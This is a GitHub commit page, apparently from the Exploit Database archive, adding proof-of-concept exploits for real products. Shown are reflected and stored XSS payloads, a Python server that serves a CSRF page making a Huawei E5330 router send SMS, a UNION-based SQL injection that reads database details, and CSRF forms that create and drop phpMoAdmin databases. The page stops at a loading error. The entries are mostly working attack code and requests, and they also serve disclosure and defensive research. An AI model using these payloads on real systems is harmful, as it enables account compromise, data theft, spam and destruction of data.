This repository has been archived by the owner on Nov 28, 2022. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 1.9k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
19 changes to exploits/shellcodes Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC) SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation Mailcleaner - Authenticated Remote Code Execution (Metasploit) Embed Video Scripts - Persistent Cross-Site Scripting All in One Video Downloader 1.2 - Authenticated SQL Injection LayerBB 1.1.1 - Persistent Cross-Site Scripting MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)
- Loading branch information
Offensive Security
committed
Jan 8, 2019
1 parent
e8dcb9f
commit deaee53
Showing
20 changed files
with
1,163 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Reflected XSS | ||
# Date: 21/12/2018 | ||
# Exploit Author: Kumar Saurav | ||
# Reference: https://0dayfindings.home.blog/2018/12/26/plc-wireless-router-gpn2-4p21-c-cn-reflected-xss/ | ||
# Vendor: ChinaMobile | ||
# Category: Hardware | ||
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00) | ||
# Tested on: Multiple | ||
# CVE : CVE-2018-20326 | ||
|
||
#Description: PLC Wireless Router's are vulnerable to a Reflected Cross Site Scripting (XSS).With this attack, the threat actor can steal cookies, session id, username or other sensitive information redirect an innocent victim to a malicious website, thus compromising the user. | ||
|
||
Reproduction Steps: | ||
Step 1: Go to Wi-fi Router Gateway (192.168.59.254 in my case) | ||
Step 2: Login as Username and Password | ||
Step 3: After Login below url will be shown | ||
(http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-) | ||
Step 4: Insert the payload "<script>alert("XSS-Saurav")</script>" at the end of the above mentinoed url and hit enter | ||
(http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-<script>alert("XSS-Saurav")</script>) | ||
Step 5: On execution of the payload, it will be popped up as "XSS-Saurav" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,49 @@ | ||
# Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS) | ||
# Date: 01/07/2019 | ||
# Exploit Author: Nathu Nandwani | ||
# Website: http://nandtech.co/ | ||
# Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/ | ||
# Version: 21.210.09.00.158 | ||
# Tested on: Windows 10 x64 | ||
# CVE: CVE-2014-5395 | ||
# Note: The administrator who opens the URL should be authenticated. | ||
import socket | ||
import time | ||
|
||
server_ip = "0.0.0.0" | ||
server_port = 80 | ||
|
||
huawei_ip = "192.168.8.1" | ||
receiving_phone_no = "01234567890" | ||
sms_text = "This is a SPAM text from Huawei E5330" | ||
|
||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
sock.bind((server_ip, server_port)) | ||
sock.listen(1) | ||
|
||
print "Currently listening at " + server_ip + ":" + str(server_port) | ||
|
||
client, (client_host, client_port) = sock.accept() | ||
|
||
print "Client connected: " + client_host + ":" + str(client_port) | ||
print "" | ||
print client.recv(1000) | ||
|
||
client.send('HTTP/1.0 200 OK\r\n') | ||
client.send('Content-Type: text/html\r\n') | ||
client.send('\r\n') | ||
|
||
client.send(""" | ||
<html> | ||
<body> | ||
<script> | ||
var xhr = new XMLHttpRequest(); | ||
xhr.open("POST", "http://""" + huawei_ip + """/api/sms/send-sms", true); | ||
xhr.send('<?xml version="1.0" encoding="UTF-8"?><request><Index>0</Index><Phones><Phone>""" + receiving_phone_no + """</Phone></Phones><Sca></Sca><Content>""" + sms_text + """</Content><Length>""" + str(len(sms_text)) + """</Length><Reserved>1</Reserved><Date>""" + time.strftime('%Y-%m-%d %H:%M:%S') + """</Date></request>'); | ||
</script> | ||
</body> | ||
</html> | ||
""") | ||
|
||
client.close() | ||
sock.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
# Exploit Title: Embed Video Scripts - Cross-site Script (stored) | ||
# Google Dork: N/A | ||
# Date: 1 Jan 2019 | ||
# Exploit Author: Deyaa Muhammad | ||
# Author EMail: contact [at] deyaa.me | ||
# Author Blog: http://deyaa.me | ||
# POC Video: https://youtu.be/2CFJLwkxpT8 | ||
# Vendor Homepage: https://codeawesome.in/embed/ | ||
# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073 | ||
# Demo Website: https://codeawesome.in/embed/ | ||
# Version: N/A | ||
# Tested on: WIN7_x68/Linux | ||
# CVE : N/A | ||
|
||
# Description: | ||
A stored xss found in "Embed Video Scripts" comments section. | ||
|
||
# POC Request: | ||
|
||
:method: POST | ||
:authority: server | ||
:scheme: https | ||
:path: /embed/comments | ||
content-length: 145 | ||
accept: */* | ||
origin: https://server | ||
x-requested-with: XMLHttpRequest | ||
user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | ||
content-type: application/x-www-form-urlencoded; charset=UTF-8 | ||
accept-encoding: gzip, deflate, br | ||
accept-language: en-US,en;q=0.9 | ||
cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540 | ||
cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6 | ||
cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6 | ||
|
||
message=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
# Exploit Title: All in One Video Downloader 1.2 - SQL Injection | ||
# Google Dork: "developed by Niche Office" | ||
# Date: 1 Jan 2019 | ||
# Exploit Author: Deyaa Muhammad | ||
# Author EMail: contact [at] deyaa.me | ||
# Author Blog: http://deyaa.me | ||
# Vendor Homepage: https://nicheoffice.web.tr/ | ||
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418 | ||
# Demo Website: https://aiovideodl.ml/ | ||
# Demo Admin Panel: https://aiovideodl.ml/admin/ | ||
# Demo Admin Credentials: demo@aiovideodl.ml/123456 | ||
# Version: 1.2 | ||
# Tested on: WIN7_x68/cloudflare | ||
# CVE : N/A | ||
|
||
# POC: | ||
https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- - | ||
|
||
# Exploit: | ||
https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
# Exploit Title: LayerBB 1.1.1 - Cross-Site Scripting | ||
# Date: 10/4/2018 | ||
# Author: 0xB9 | ||
# Twitter: @0xB9Sec | ||
# Contact: 0xB9[at]pm.me | ||
# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=26 | ||
# Version: 1.1.1 | ||
# Tested on: Ubuntu 18.04 | ||
# CVE: CVE-2018-17997 | ||
|
||
|
||
1. Description: | ||
LayerBB is a free open-source forum software. The XSS found allows users to add a payload to the title of conversations (PMs). | ||
|
||
|
||
2. Proof of Concept: | ||
|
||
- Start a new conversation sending to any user (victim) you want | ||
- Use a payload in the title <script>alert('XSS')</script> | ||
- Next time the user (victim) visits the site payload will execute | ||
|
||
|
||
3. Solution: | ||
Update to 1.1.2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
# Exploit Title: MyBB OUGC Awards Plugin v1.8.3 - Cross-Site Scripting | ||
# Date: 12/31/2018 | ||
# Author: 0xB9 | ||
# Twitter: @0xB9Sec | ||
# Contact: 0xB9[at]pm.me | ||
# Software Link: https://community.mybb.com/mods.php?action=view&pid=396 | ||
# Version: 1.8.3 | ||
# Tested on: Ubuntu 18.04 | ||
# CVE: CVE-2019-3501 | ||
|
||
|
||
1. Description: | ||
OUGC Awards plugin for MyBB forum allows admins and moderators to grant awards to users which displays on profiles/posts. The reason input isn't sanitized on awards page and user profiles. | ||
|
||
|
||
2. Proof of Concept: | ||
|
||
- Have a mod account level or higher | ||
- Go to Manage Awards in ModCP | ||
- Give an award to a user and input payload for reason <script>alert('XSS')</script> | ||
|
||
- Payload executes when viewing award on awards.php and user profiles. | ||
|
||
|
||
3. Solution: | ||
Update to 1.8.19 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,157 @@ | ||
################################################################################################################################## | ||
# Exploit Title: phpMoAdmin 1.1.5 - MongoDB GUI | Multiple Vulnerabilities | ||
# Date: 03.01.2019 | ||
# Exploit Author: Ozer Goker | ||
# Vendor Homepage: http://www.phpmoadmin.com | ||
# Software Link: http://www.phpmoadmin.com/file/phpmoadmin.zip | ||
# Version: 1.1.5 | ||
################################################################################################################################## | ||
|
||
Introduction | ||
|
||
phpMoAdmin - MongoDB GUI | ||
MongoDB administration tool for PHP | ||
|
||
Vulnerabilities: CSRF | XSS Reflected & Stored | ||
|
||
CSRF details: | ||
|
||
################################################################################# | ||
|
||
CSRF1 | ||
|
||
Create Database | ||
|
||
|
||
<html> | ||
<body> | ||
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET"> | ||
<input type="text" name="db" value="new.database"/> | ||
<input type="text" name="newdb" value="testdb"/> | ||
<input type="submit" value="Create DB"/> | ||
</form> | ||
</body> | ||
</html> | ||
|
||
|
||
################################################################################# | ||
|
||
CSRF2 | ||
|
||
Drop Database | ||
|
||
<html> | ||
<body> | ||
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET"> | ||
<input type="text" name="action" value="dropDb"/> | ||
<input type="text" name="db" value="testdb"/> | ||
<input type="submit" value="Drop DB"/> | ||
</form> | ||
</body> | ||
</html> | ||
|
||
################################################################################# | ||
|
||
CSRF3 | ||
|
||
Repair Database | ||
|
||
<html> | ||
<body> | ||
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET"> | ||
<input type="text" name="action" value="repairDb"/> | ||
<input type="text" name="db" value="testdb"/> | ||
<input type="submit" value="Repair DB"/> | ||
</form> | ||
</body> | ||
</html> | ||
|
||
################################################################################# | ||
|
||
CSRF4 | ||
|
||
Add New Collection | ||
|
||
<html> | ||
<body> | ||
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET"> | ||
<input type="text" name="action" value="createCollection"/> | ||
<input type="text" name="db" value="testdb"/> | ||
<input type="text" name="collection" value="testcollection"/> | ||
<input type="submit" value="Create Collection"/> | ||
</form> | ||
</body> | ||
</html> | ||
|
||
################################################################################# | ||
|
||
CSRF5 | ||
|
||
Drop Collection | ||
|
||
<html> | ||
<body> | ||
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET"> | ||
<input type="text" name="action" value="dropCollection"/> | ||
<input type="text" name="db" value="testdb"/> | ||
<input type="text" name="collection" value="testcollection"/> | ||
<input type="submit" value="Drop Collection"/> | ||
</form> | ||
</body> | ||
</html> | ||
|
||
|
||
################################################################################# | ||
|
||
|
||
XSS details: | ||
|
||
################################################################################# | ||
|
||
XSS1 | Reflected | ||
|
||
URL | ||
http://localhost/phpmoadmin/moadmin.php?db=admin%3Cscript%3Ealert(1)%3C/script%3E | ||
|
||
METHOD | ||
Get | ||
|
||
PARAMETER | ||
db | ||
|
||
PAYLOAD | ||
<script>alert(1)</script> | ||
|
||
################################################################################# | ||
|
||
XSS2 | Reflected | ||
|
||
URL | ||
http://localhost/phpmoadmin/moadmin.php?db=new.database&newdb=testdb%3Cscript%3Ealert(2)%3C/script%3E | ||
|
||
METHOD | ||
Get | ||
|
||
PARAMETER | ||
newdb | ||
|
||
PAYLOAD | ||
<script>alert(2)</script> | ||
|
||
################################################################################# | ||
|
||
XSS3 | Stored | ||
URL | ||
http://localhost/phpmoadmin/moadmin.php?collection=%3Cscript%3Ealert%283%29%3C%2Fscript%3E&action=createCollection&db=testdb | ||
|
||
METHOD | ||
Get | ||
|
||
PARAMETER | ||
collection | ||
|
||
PAYLOAD | ||
<script>alert(3)</script> | ||
|
||
|
||
################################################################################# |
Oops, something went wrong.